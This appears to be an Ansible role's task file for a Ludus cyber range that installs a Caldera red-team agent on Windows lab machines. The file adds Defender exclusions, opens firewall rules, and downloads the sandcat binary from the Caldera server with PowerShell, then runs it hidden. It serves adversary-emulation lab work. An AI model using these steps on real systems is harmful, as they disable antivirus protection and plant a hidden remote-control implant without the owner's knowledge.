---

- name: Exclude agent from defender
  ansible.windows.win_powershell:
    script: |
      Add-MpPreference -ExclusionPath {{ ludus_caldera_client_agent_name}}
      Add-MpPreference -ExclusionProcess {{ ludus_caldera_client_agent_name}}

- name: Enable firewall
  ansible.windows.win_powershell:
    script: |
      New-NetFirewallRule -DisplayName "Caldera Agent Outbound" -Direction Outbound -Program "{{ ludus_caldera_client_agent_name }}" -Action Allow  -Profile Any -Enabled True;
      New-NetFirewallRule -DisplayName "Caldera Agent Inbound" -Direction Inbound -Program "{{ ludus_caldera_client_agent_name }}" -Action Allow -Profile Any -Enabled True;

- name: Install agent
  ansible.windows.win_powershell:
    script: |
      $server="http://10.{{ range_second_octet }}.{{ ludus_caldera_vm.vlan }}.{{ ludus_caldera_vm.ip_last_octet }}:8888";
      $url="$server/file/download";
      $wc=New-Object System.Net.WebClient;
      $wc.Headers.add("platform","windows");
      $wc.Headers.add("file","sandcat.go");
      $data=$wc.DownloadData($url);
      get-process | ? {$_.modules.filename -like "{{ ludus_caldera_client_agent_name}}"} | stop-process -f;
      rm -force "{{ ludus_caldera_client_agent_name}}" -ea ignore;
      [io.file]::WriteAllBytes("{{ ludus_caldera_client_agent_name }}",$data) | Out-Null;
      Start-Process -FilePath {{ ludus_caldera_client_agent_name }} -ArgumentList "-server $server -group red" -WindowStyle hidden;

